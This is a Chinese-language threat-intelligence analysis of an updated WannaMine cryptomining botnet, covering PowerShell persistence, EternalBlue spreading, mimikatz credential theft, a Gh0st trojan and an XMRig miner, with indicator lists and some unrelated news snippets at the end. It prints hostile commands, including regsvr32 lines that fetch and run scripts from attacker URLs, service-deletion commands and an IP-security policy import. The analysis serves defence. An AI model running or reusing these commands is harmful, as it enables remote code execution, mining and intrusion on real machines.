感谢腾讯御见威胁情报中心来稿!
原文:https://mp.weixin.qq.com/s/GGD563kHbxrvt-XRitjUbQ
腾讯安全御见威胁情报中心检测到WannaMine挖矿僵尸 *** 再度更新,WannaMine最早于2017年底被发现,主要采用Powershell“无文件”攻击组成挖矿僵尸 *** 。更新后的WannaMine具有更强的传播性,会采用多种手法清理、阻止竞争木马的挖矿行为,同时安装远控木马完全控制中毒系统。
本次更新后的WannaMine病毒具有以下特点:
WannaMine安装计划任务进行持久化,计划任务名:’Microsoft\Windows\MUI\LMRemove’,
‘Microsoft\Windows\Multimedia\SystemEventService’,执行以下命令:
regsvr32 /u /s /i:http://safe.lxb.monster/networks.xsl scrobj.dll
regsvr32 /u /s /i:http://skt.xiaojiji.nl/networks.xsl scrobj.dll
Regsvr32.exe是一个命令行程序,用于在Windows系统上注册和注销对象链接和嵌入控件,包括动态链接库(DLL),Regsvr32.exe可用于执行任意二进制文件。由于regsvr32.exe支持 *** *** ,因此可以通过在调用期间将统一资源定位符(URL)作为参数传递外部Web服务器上的文件来加载脚本。
在计划任务执行时,恶意脚本networks.xsl被Regsvr32.exe执行。networks.xsl实际上使用XML语言描述,其中被嵌入了一段 *** cript脚本,功能为通过CMD命令执行一段加密的Powershell代码。
两段Powershell代码解码后如下:
分别从http[:]//skt.xiaojiji.nl/networks.ps1和
http[:]//safe.dashabi.nl/networks.ps1下载得到文件networks.ps1。networks.ps1经过加密的Powershell脚本,也是是核心攻击代码。代码首先中定义了三个变量$miiiiii ,$fffffff,$ssssssss来分别保存加密数据,然后继续执行,后续代码中会读取并解密变量中的数据。
变量之后的代码以字符“&( $VerBOsepreFErEnce.ToSTrinG()[1,3]+’X’-joiN”)“开头,这段字符在Powershell的混淆代码中较为常见,功能等同于Powershell命令中的“IEX”(Invoke-Expression),IEX用于将字符串作为命令执行,当去掉IEX后,执行后就会显示原本的字符串。
我们将这段字符替换为自定义输出命令“write-host”,即可得到解码后的Powershell代码。
核心Powershell删除竞争对手安装的WMI后门代码,包括属于MyKings僵尸 *** 的“ *** youmm3” ,“ *** youmm4”,” *** youmm”,“ *** amm3”后门,以及属于未知团伙的“BotFilter82“,“BotConsumer23”,” BotFilter82”后门。
然后通过以下代码安装WMI事件消费者,其中事件过滤器名$filterName = (‘Windows Events Filter’),事件消费者名$consumerName = (‘Windows Events Consumer’)。当捕获到指定的事件发生时执行恶意代码”$EncodedScript”,达到持久化攻击的目的。
对比2019年4月WannaMine代码可以发现基础设施已发生变化:
旧版:
备用服务器地址:profetestruec.net、45.199.154.108、172.247.116.87
默认下载地址:172.247.116.8
默认端口:8000
核心Powershell:in6.ps1,in3.ps1
新版:
备用服务器地址:safe.dashabi.nl、45.77.148.102、skt.xiaojiji.nl
默认下载地址:skt.xiaojiji.nl
默认端口:80
核心Powershell:network.ps1
申请一个名为“root\default:System_Anti_Virus_Core “的WMI对象,将变量中的数据保存到WMIClass当中以备后续使用。
接着从变量$fffffff中获取代码$defun执行。
$defun中函数Download_file()负责下载文件并保持到temp目录下。
RunDDOS()负责启动DDOS进程。
RunXMR()负责启动门罗币挖矿进程。
KillBot()负责清除竞争对手,杀死进程命令行包含字符“System_Anti_Virus_Core “,”cryptonight “的进程,同时杀死使用端口3333、5555、7777进行TCP通信的进程。
实现了“永恒之蓝“漏洞攻击代码,攻击函数为eb7()、eb8()。、
Get-IpInB()函数从网卡配置信息中获取IP地址,取A段和B段作为IP地址开头,然后随机生成C段和D段组成待攻击的IP地址列表。
在Test-Port()中测试IP地址是否开放445端口,在Get-creds()中通过密码抓取工具mimiktaz获取当前域登录密码,得到Username、Domain、Password/NTLM数据并保存。
密码搜集工具mimiktaz由初始阶段定义的三个变量之一的$miiiiii解密获得。在Test-ip()中针对mimiktaz获取到域登录凭证的IP进行攻击,利用WMI的远程命令执行功能,调用Invoke-WmiMethod执行远程Powershell命令(64位执行
http[:]//safe.dashabi.nl/networks.ps1,32位执行http[:]//safe.dashabi.nl/netstat.ps1)。
核心Powershell利用“永恒之蓝“漏洞攻击工具进行攻击。首先调用[PingCastle.Scanners.m17sc]::Scan()进行漏洞扫描,将存在漏洞的IP保存至$i17中,然后调用攻击函数eb7()和eb8()进行攻击。
在目标系统执行shellcode命令$sc,该命令内容由之前的三个变量之一$ssssssss中解密得到,主要功能为判断WMI中是否存在root\Subscription -Class __FilterToConsumerBinding命名空间下的null对象或者不含“Windows Events Filter“字符的对象,如果是则执行远程恶意代码:http[:]//207.246.124.125/networks.ps1
Networks.ps1中解码出$fffffff后,调用其函数RunDDOS ,指定参数”cohernece.exe”,从http[:]//safe.dashabi.nl/coherence. *** 二进制数据,并还原成PE文件cohernece.exe到%Temp%目录下,通过start-process命令执行。
分析发现,该文件当前并非DDOS木马,而是Gh0st远控木马,当前使用的C&C地址为six.lxb.monster:8447。
Gh0st远控木马较为常见,技术分析从略。
Networks.ps1中解码出$fffffff后,调用其函数RunXMR,指定参数”steam.exe”,从http[:]//safe.dashabi.nl/steam. *** 二进制数据,并还原成PE文件steam.exe到%Temp%目录下,通过start-process命令执行。steam.exe为自解压程序,解压目录为c:\windows\fonts\Wbems\,解压结束后首先执行bat脚本c:\windows\fonts\Wbems\1.bat。
再次删除竞争对手的服务:
sc stop “evemt windows”
sc delete “evemt windows”
sc stop “event log”
sc delete “event log”
sc stop ias
sc delete ias
sc stop FastUserSwitchingCompatibility
sc delete FastUserSwitchingCompatibility
sc stop MicrosoftMysql
sc delete MicrosoftMysql
设置解压目录下的木马文件为隐藏、系统属性:
attrib -a -s -h c:\windows\fonts\Wbems\*.exe
启动c:\windows\fonts\Wbems\ipp.exe,该文件也是Gh0st远控木马。
将解压出的病毒文件拷贝到目标目录下
netsh ipsec static importpolicy file=c:\windows\fonts\Wbems\close.ipsec,将木马释放的IP安全策略文件close.ipsec导入到当前机器。
close.ipsec通过配置IP筛选器,阻止本机向其他47个矿池IP地址发起的TCP *** 连接,从而阻止竞品木马的挖矿行为。
阻止任何地址与本机的139/445端口的TCP或UDP通信,包括局域网和远程连接,从而阻止其他病毒通过“永恒之蓝”漏洞入侵。
通过SetACL.exe修复注册表”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator”的访问属性,并在该注册表下写入StartExe值,利用微软”The Ease of Access Center”(便捷访问中心)特性来启动木马uas.exe。
然后通过服务管理程序msdtc,将挖矿木马xx.exe安装为服务”Event Logs”并启动服务。设置服务的DisplayName和Description值如下:
DisplayName “USO Services”
Description “Manages profiles and accounts on a SharedPC configured device”
挖矿程序xx.exe采用XMRig 5.4.0版本编译,支持CPU和NVIDIA CUDA显卡GPU挖矿(4.5.0以后)。
使用以下矿池:
xmr.wulifang.nl:80
91.121.140.167:443
hash.wulifang.nl:80
131.153.76.130:443
xme.wulifang.nl:13531
47.101.30.124:13531
fr.minexmr.com:80
钱包:
44AVCF3zFkWLKYrXQ7A2L4MjWxhJNxzZZczD8N9LjEbE9PCwdjRg1iJ4oHedTxngSVKKV8H74ZDXgHoq9Wgt3cVkJn3eNbS
根据该病毒的技术特点,我们建议企业采取以下措施加以防范:
IP
45.77.148.102
207.246.124.125
Domain
safe.dashabi.nl
safe.lxb.monster
six.lxb.monster
skt.xiaojiji.nl
URL
http[:]//safe.lxb.monster/networks.xsl
http[:]//skt.xiaojiji.nl/networks.xsl
http[:]//skt.xiaojiji.nl/networks.ps1
http[:]//safe.dashabi.nl/networks.ps1
http[:]//safe.dashabi.nl/netstat.ps1
http[:]//207.246.124.125/networks.ps1
http[:]//safe.dashabi.nl/coherence.txt
http[:]//safe.dashabi.nl/steam.txt
参考链接:
WannaMine挖矿木马更新基础设施 新手法已大赚17万
WannaMine挖矿木马再活跃,14万台linux系统受攻击
Facebook动态消息(News Feed)因为存在重大排序错误,过去6个月一直推送“糟糕”内容。由于排序算法存在漏洞,动态消息抬高了虚假、暴力信息的权重。去年10月,工程师发现推送有问题,当时动态消息中的虚假信息明显增多。 虚假信息本来是经过事实核查员审查过的,应该早早得到抑制,但这些信息却四处...
俄罗斯关联的黑客组织 Stormous 声称已成功入侵可口可乐公司,并公开售卖大量数据。Stormous 表示窃取了 161GB 的财务数据、密码和账户,然后以 644 万美元或 1600 万个比特币的价格出售这些数据。 Stormous 在宣布成功入侵之前,曾在 Telegram 上发起投票,询...
反病毒软件主要根据各种病毒特征进行预防、隔离等操作,但有时候也会出现误杀的情况。UserBenchmark 就是最新案例。根据 VirusTotal,这个流行的免费基准测试工具已被近二十个网站标记为恶意软件。 UserBenchmark 是一个轻量级的免费软件,可以测试你的 CPU、GPU、内...
据报道,日前,微软、英伟达等科技公司遭到一系列黑客攻击,而网络安全人员在调查中,把目标锁定在了英国英格兰牛津一位16岁少年。四名网络安全专家目前正代表微软等被攻击公司展开调查,对名为“Lapsus$”的黑客组织进行调查,专家们判断,上述16岁少年是这个黑客组织的主谋。 这个黑客组织过去进行了多次高调...
一位最近出院的心脏病患者正在使用智能手表来帮助监测他的心电图信号。这款智能手表看起来非常安全,但处理该健康信息的神经网络使用的是私人数据,这些数据仍有可能被恶意代理通过侧信道攻击窃取。 边信道攻击试图通过间接利用一个系统或其硬件来收集秘密信息。在一种类型的边信道攻击中,精明的黑客可以在神经网络运行...
一个流传了6个月的骗局已经发展到影响iOS用户。黑客利用社交媒体、约会应用程序、加密货币和滥用苹果公司企业开发者计划,从毫无戒心的受害者那里盗取了至少140万美元。 名为CryptoRom欺诈的实施相当直接,在通过社交媒体或现有数据应用程序获得受害者的信任后,用户被愚弄安装一个修改版的加密货币交易所...